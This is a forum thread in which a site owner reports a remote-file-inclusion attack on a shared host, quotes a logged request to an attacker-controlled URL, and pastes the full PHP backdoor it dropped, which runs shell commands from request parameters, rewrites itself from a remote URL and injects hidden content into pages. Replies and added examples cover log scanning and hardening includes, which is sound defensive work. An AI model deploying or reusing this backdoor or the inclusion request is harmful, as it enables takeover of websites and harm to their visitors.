
repeated hacking attempts

Posted: Thu Oct 16, 2008 11:15 am
by ziggy1621
I've got a site that an IRC bot seems to be attacking, writing an ActiveX virus after the <body> tags. I've been fighting this for weeks and here is what I have....

It is shared hosting, so php.ini is not available and my htaccess is limited. register_globals was on; today I turned it off after some extensive reading. The hacker is running code like the following, found in my logs:

Code:
//phpSecurePages/secure.php?&cfgProgDir=http://rdxihx.angelfire.com/php
where the host it's getting the file from changes each time, so blocking IPs/domains doesn't work, and I have actually deleted phpSecurePages from the site and yet this script still works. You can follow the link after cfgProgDir to read the code that it accesses; sometimes it then creates a random file with the following code:

Code:
<?php
ignore_user_abort(1);
set_time_limit(0);
 
function Clear()
{
    unlink("c");
    unlink("1r");
  unlink("log");
}
 
function Clear2()
{
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    $fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
  $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    echo " upt-ok";
}
 
function GetVar($name, &$var)
{
    $var = "";
    if (isset($_POST[$name]))
        $var = $_POST[$name];
 
  if (isset($_GET[$name]))
        $var = $_GET[$name];
    
    if (($var) =="")
      return  false;
      else return true;
}
 
function Gen()
{
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    if (isset($_POST["sg"]))
        $sg = $_POST["sg"];
 
  if (isset($_GET["sg"]))
        $sg = $_GET["sg"]; 
        
    if (isset($_POST["gm"]))
      $g = $_POST["gm"];
 
    if (isset($_GET["gm"]))
        $g = $_GET["gm"];
        
        
    $path = "";
    $fr = fopen("1r", "a+");
    if (file_exists("c"))
    {
        $fconf = file("c");
        $tname = trim($fconf[0]);
        $cname = trim($fconf[1]);
        $curs = trim($fconf[2]);
        $pid = trim($fconf[3]);
        if ($pid == 100)
        {
            $pid = 0;
            $rnd = mt_rand(0, 999);
            $nm = "";
        for ($i=0; $i<3; $i++)
          {
              $ran = mt_rand(0,26);
              $sym = $alp[$ran];
              $nm = $nm.$sym;
          }
            $cname = $nm;
            mkdir("$tname/$cname");
            $curs = $g;
        }
    }
    else 
    {
        $rnd = mt_rand(0, 999);
        $nm = "";
      for ($i=0; $i<5; $i++)
        {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        $pid = 0;
        $curs = $g;
        mkdir($tname);
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        $rnd = mt_rand(0, 999);
        $nm = "";
    for ($i=0; $i<3; $i++)
      {
          $ran = mt_rand(0,26);
          $sym = $alp[$ran];
          $nm = $nm.$sym;
      }
        $cname = $nm;
    mkdir("$tname/$cname");
    }
  $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {
        $fp = fopen($gname."?g=$curs", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        
        $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
    }
    
    if ($j==100)
    {
      $fp = fopen($gname."?g=$curs&m=1", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        $map = "$path/$tname/$cname/$curs"."_lm.htm";
        fwrite($fr,"$map\n");
    }
    
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n");
    fwrite($fconf, $cname."\n");
    fwrite($fconf, $curs."\n");
    $nj = $j;
    fwrite($fconf, $nj."\n");
    fclose($fconf);
}
 
function Update()
{
    $thisname = "1.php";
    if (isset($_POST['u']))
      $u = $_POST['u'];
      
    if (isset($_GET['u']))
         $u = $_GET['u'];
         
     $fp = fopen($u, "r");
  $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
  fclose($fp);
  
  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}
 
function Com()
{
    if (isset($_POST['c']))
      @system($_POST['c']);
  if (isset($_GET['c']))
        @system($_GET['c']);
}
 
function MRepl()
{
    $mpt = "";
    $drs = "";
    $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
  $endtag = "</font></body></html><dd5> "; 
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    GetVar("mpt", $mpt);
     // remove the closing html tags
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fp = fopen($mpt, "r");
  $drs = '';
    while (!feof($fp))
    {
         $fc = fgets($fp, 1024);
         if (!$fc) 
         {  
       exit();
         }
       $drs .= $fc;
    }
  fclose($fp);
  $fin = $fin.$begtag;  
  $fin = $fin.$drs;
  $fin = $fin.$endtag; 
  $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}
 
function Main()
{
    if (isset($_POST['u']) || isset($_GET['u']))
    {
        Update();
        exit();
    }
    
    if (isset($_POST['c']) || isset($_GET['c']))
    {
        Com();
        exit();
    }
    
    if (isset($_POST['g']) || isset($_GET['g']))
    {
        Gen();
        exit();
    }
    
    if (isset($_POST['s']) || isset($_GET['s']))
    {
        MRepl();
        exit();
    }
    
  if (isset($_POST['cl']) || isset($_GET['cl']))
    {
        Clear();
        exit();
    }
    
    if (isset($_POST['cl2']) || isset($_GET['cl2']))
    {
        Clear2();
        exit();
    }
    
    echo "<ok>";
    
}
 
Main();
 
?>
Any help appreciated... I'm dying here.
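The logged request above is a remote-file-inclusion probe: a query parameter whose value is itself a URL. The following script, added here as an example and not code from the thread or from phpSecurePages, scans access-log lines for that pattern. The log lines are constructed for illustration (the first reproduces the request from the post; the client addresses are documentation ranges).

```php
<?php
// Added example, not from the thread: scan access-log lines for query-string
// values that are themselves URLs, the remote-file-inclusion probe shown in
// the first post. The log lines are constructed; the first reproduces the
// request from the post, the addresses are documentation ranges.

$logLines = [
    '192.0.2.10 - - [16/Oct/2008:10:02:11 +0000] "GET /phpSecurePages/secure.php?&cfgProgDir=http://rdxihx.angelfire.com/php HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [16/Oct/2008:10:03:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Oct/2008:10:05:02 +0000] "GET /index.php?page=ftp://198.51.100.9/x.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"',
];

// A value carrying a URL scheme (http://, ftp://, php://, data:) has no
// business in a parameter that a script might turn into an include path.
function isRemoteUrl(string $value): bool
{
    return preg_match('#^\s*(?:[a-z][a-z0-9+.\-]*://|data:)#i', $value) === 1;
}

// Returns one record per suspicious parameter: client, parameter name, value.
function findRfiProbes(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        if (!preg_match('#^(\S+) .*"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"#', $line, $m)) {
            continue;                          // not a request line we understand
        }
        $client = $m[1];
        $target = $m[2];
        $query = parse_url($target, PHP_URL_QUERY);
        if (!is_string($query) || $query === '') {
            continue;                          // no query string at all
        }
        parse_str($query, $params);            // also percent-decodes the values
        foreach ($params as $name => $value) {
            if (is_string($value) && isRemoteUrl($value)) {
                $hits[] = ['client' => $client, 'param' => $name, 'value' => $value];
            }
        }
    }
    return $hits;
}

foreach (findRfiProbes($logLines) as $hit) {
    printf("RFI probe from %s: %s=%s\n", $hit['client'], $hit['param'], $hit['value']);
}
```

Run against a real access log one line at a time; a hit against a path that no longer exists on disk but still returns 200 is the sign that some other file is answering the request.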

Re: repeated hacking attempts

Posted: Fri Oct 17, 2008 1:52 pm
by youropensource
Please check your file and folder permissions, and change file permissions from 755 or 777 to 644.

Re: repeated hacking attempts

Posted: Sun Oct 19, 2008 2:05 am
by Mordred
It looks like a bot probing for known exploits. The one you cite is this: http://secunia.com/advisories/15994/
If you don't have the software in question, there's no need to worry. Alert your hosting provider if it goes on.

Re: repeated hacking attempts

Posted: Fri Oct 31, 2008 2:42 am
by czyhx
I think you can write PHP code like this:

Code:
include dirname(__FILE__).'/'.$cfgProgDir;
If you don't do this, it looks like

Code:
include('http://rdxihx.angelfire.com/dd.php');
I'm sorry. I only know a little English.
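The two snippets above are the core of the problem: an include path assembled from a variable that register_globals lets the query string set. Here is the vulnerable shape beside a hardened one, as an added example that is not phpSecurePages' actual source or code from the thread. $cfgProgDir stands in for the configuration variable named in the logged request, and the module names in the allow-list are hypothetical; prefixing the script directory alone still accepts ../ sequences, so the hardened version also pins the resolved path to the base directory.

```php
<?php
// Added example, not code from phpSecurePages or from the thread. $cfgProgDir
// stands in for the configuration variable named in the logged request; the
// vulnerable function models the behaviour the thread describes rather than
// the project's actual source.

// VULNERABLE: with register_globals on, ?cfgProgDir=http://... sets this
// variable from the query string, and include() will fetch remote code when
// allow_url_fopen/allow_url_include permit it.
function loadModuleVulnerable(string $cfgProgDir, string $module): void
{
    include $cfgProgDir . '/' . $module . '.php';
}

// HARDENED: never build an include path from request data. The module name
// must be on a fixed allow-list, the base directory is fixed by the script's
// own location, and the resolved path must stay inside that directory.
const ALLOWED_MODULES = ['secure', 'login', 'logout'];   // hypothetical names

function resolveModulePath(string $module, string $baseDir): ?string
{
    if (!in_array($module, ALLOWED_MODULES, true)) {
        return null;                           // unknown or attacker-chosen name
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $module . '.php');
    if ($base === false || $path === false) {
        return null;                           // missing file or directory
    }
    // Defence in depth: even an allow-listed name must resolve under $baseDir,
    // which also rules out ../ sequences and any remote scheme.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function loadModuleHardened(string $module): void
{
    $path = resolveModulePath($module, __DIR__ . '/phpSecurePages');
    if ($path === null) {
        http_response_code(400);
        exit('invalid module');
    }
    include $path;
}
```

allow_url_include and allow_url_fopen are PHP_INI_SYSTEM settings, so on shared hosting without php.ini access the allow-list and path check above are the controls the site owner actually has.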

Re: repeated hacking attempts

Posted: Fri Oct 31, 2008 4:58 am
by Hannes2k
Hi,
"phpSecurePages is a PHP module to secures pages with a login name and password." oO, how could this be vulnerable to a file inclusion attack.


If you have deleted phpSecurePages from your webspace, and there is no other php backdoor, this exploit won't work anymore.

But you said that this attack still works, so is there maybe a backdoor php file? An attacker normally uploads their own php script with a backdoor, so if you close the vulnerable script, the attacker still has access to your website.
Check all php files, or delete your complete website (if possible) and upload your original files.
A php backdoor could also be part of a legal php script, just by adding some code lines to existing scripts.

Re: repeated hacking attempts

Posted: Fri Oct 31, 2008 9:53 am
by ziggy1621
Hannes2k wrote:
Hi,
"phpSecurePages is a PHP module to secures pages with a login name and password." oO, how could this be vulnerable to a file inclusion attack.
A little searching the web shows that it has a couple of vulnerabilities. Just because it's sold as 'security' software doesn't mean the code is perfect.